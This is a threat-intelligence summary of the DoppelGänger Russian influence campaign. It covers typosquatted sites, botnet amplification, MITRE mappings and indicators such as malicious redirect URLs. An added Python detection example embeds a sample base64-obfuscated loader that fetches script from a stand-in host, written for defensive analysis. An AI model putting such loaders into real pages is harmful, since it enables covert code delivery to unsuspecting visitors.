Master of Puppets: Uncovering the DoppelGänger pro-Russian influence campaign

DoppelGänger is a long-running Russian influence operation that targets Western audiences to undermine support for Ukraine and sow societal divisions, using a two-tier network of typosquatted and independent news sites amplified by inauthentic social media accounts across X, Facebook, Instagram, TikTok, YouTube, and more. It employs a multilayer redirection infrastructure and a parallel Russian-speaking cluster, with attribution to Structura National Technologies (Structura) and the Social Design Agency (SDA). #DoppelGanger #Structura

Keypoints

  • The DoppelGänger campaign is an ongoing influence operation, active since 2022 and attributed to Russia (Structura and SDA).
  • The primary goal is to diminish support for Ukraine and to sow divisions in Western democracies; targets include France, Germany, Ukraine, the United States, and others.
  • It relies on a network of two types of websites—typosquatted legitimate outlets and independent news sites—to publish disinformation articles.
  • Disinformation is disseminated via inauthentic social accounts across multiple platforms, with Keitaro used to monitor campaign effectiveness.
  • The infrastructure features a three-stage redirection process: stage 0 is the social botnet, stage 1 the throwaway URLs/websites, and stages 2/3 the redirections toward the disinformation sites; page metadata and thumbnails are generated so the social platforms render link previews.
  • A new Russian-speaking cluster suggests a possible additional objective, potentially tied to Russian domestic propaganda missions for Moscow.

MITRE Techniques

  • [T1566.002] Spearphishing Link – The first-stage social botnet posts incite curious users to click the given link. “The redirection chain starts with a simple post or ad on social media where the target audience is present.”
  • [T1583] Acquire Infrastructure – The campaign uses cheap domain names from uncommon TLDs and bulletproof hosting to support the operation. “The first stage website uses cheap domain names from uncommon TLDs such as .click, .online or .buzz. Sekoia analysts observed a few hundred of these domains, and a random subdomain is generated on one of them for every shared article. Most of these domains were created between March and October 2023 and are hosted on Russian-related AS and some bulletproof hosters.”
  • [T1036] Masquerading – Typosquatted legitimate websites are used to enhance the credibility of narratives. “Within the first category, various legitimate websites have been typosquatted to enhance the credibility of purported narratives by associating them with trusted sources.”
  • [T1027] Obfuscated/Deobfuscated Files or Information – Stage 2/3 rely on obfuscated scripts, including base64 encoding, to perform redirection. “The code of the stage 2 pages is simple and ends with a base64 encoded and lightly obfuscated script which is decoded and executed when the page is loaded into the user’s browser.”
  • [T1059] Command and Scripting Interpreter – The obfuscated script loads additional content by creating a new script tag with a src attribute. “The script creates a new script tag in the HTML page with a src attribute, allowing it to get its content from a specific URL.”
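The stage-2 pattern described under T1027/T1059 (an inline base64 blob decoded in the browser that builds a script tag pointing at the next stage) can be triaged statically. The following is an added example for analysts, not code from the Sekoia report; the sample page, the `atob`/`eval` wrapper and the `stage3.example` domain are constructed placeholders.

```python
import base64
import re

# Constructed stage-2 page modelled on the pattern above: a base64 literal is
# decoded and executed, and the decoded code only adds a <script src=...> tag.
_INNER = ("var s=document.createElement('script');"
          "s.src='https://stage3.example/next.js';"
          "document.head.appendChild(s);")
SAMPLE_PAGE = (
    "<html><body><p>Loading...</p>"
    "<script>eval(atob('" + base64.b64encode(_INNER.encode()).decode() + "'));</script>"
    "</body></html>"
)

# Base64 literal handed to atob(); 16+ chars filters out short decoys.
B64_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
# Dynamic script-tag creation and the URL assigned to its src attribute.
CREATE_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
SRC_RE = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")


def decode_inline_blobs(html):
    """Return the decoded text of every valid base64 literal passed to atob()."""
    decoded = []
    for m in B64_RE.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def find_loader_urls(html):
    """Return src URLs loaded by decoded payloads that build a script tag.

    A non-empty result is the detection signal: the page hides its next hop
    inside an encoded blob instead of a plain <script src> or HTTP redirect.
    """
    urls = []
    for payload in decode_inline_blobs(html):
        if CREATE_RE.search(payload):
            urls.extend(SRC_RE.findall(payload))
    return urls


if __name__ == "__main__":
    print(find_loader_urls(SAMPLE_PAGE))
```

Run it over fetched landing pages and pivot on the returned URLs against known stage-2/3 domains; a page that decodes a blob but creates no script tag is not flagged, so extend `CREATE_RE` if you see other loader idioms.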

Indicators of Compromise

  • [Domain] – Domains used for the network and redirection: newsroad.online, docnanb.com, and other typosquatted/independent sites.
  • [IP Address] – Hosting servers for the infrastructure: 178.62.255.247, 206.189.243.184.
  • [URL] – Stage-1/Stage-2 redirection URLs: http://a8czwp.gituyahmainnya18.click/s8yrcy, http://docnanb.com/holy9180238
  • [File name] – WordPress XML-RPC endpoint: xmlrpc.php (and related pingback mechanism like pingback.ping)

Read more: https://blog.sekoia.io/master-of-puppets-uncovering-the-doppelganger-pro-russian-influence-campaign/